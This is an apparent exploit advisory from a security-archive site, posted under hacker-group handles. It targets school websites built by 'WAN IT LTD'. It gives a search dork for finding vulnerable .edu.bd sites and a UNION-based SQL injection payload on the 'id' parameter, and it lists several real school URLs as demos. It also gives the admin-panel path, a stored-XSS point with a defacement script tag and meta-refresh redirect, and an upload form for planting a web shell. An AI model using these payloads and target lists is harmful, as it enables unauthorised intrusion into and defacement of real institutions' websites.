WAN IT LTD - SQLInjection / XSS / JSDeface

2017.10.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#Title: WAN IT LTD SQl/XSS Deface #Dork: intext:"WAN IT LTD" inurl:"id=" +"site:edu.bd" #Date: 26.10.2017 #Test: W10 #CWEs: CWE-89 #Exploit Discovered By: Informacion - Anonymous #Author: mr.Gh0st N@0b #======================# #P00f: #http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject} |--- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: menu=aboutus&id=-8681' UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x67 495a756b546c697068424a6759715a545a4a4255787748667350656953787a65746450734b4e6f,0x7 16a7a7171)-- Satn Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT] ---| #Admin Panel #http://site.com/admin/ {login Here} #Dem0s: #http://sonarhatsnc.edu.bd/about_us.php… #http://rwahs.edu.bd/about_us.php… #http://rwahs.edu.bd/about_us.php… #http://www.gozkhalimlths.edu.bd/about_us.php… #http://coghighschool.edu.bd/about_us.php… #XSS Alert #/admin/add_news.php?menu=news {Exploit XSS Script} #Example #<script src="http://yourdeface.js"></script> #<META http-equiv="refresh" content="1;URL=yourdefacepage"> #Upload Shell #/admin/add_gallery.php?menu=gallery {Upload Here} #===========================================#

References:

https://www.facebook.com/Informacion-Anonymous-611394289006994/
https://www.facebook.com/official.myanmar.noob.hackers/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top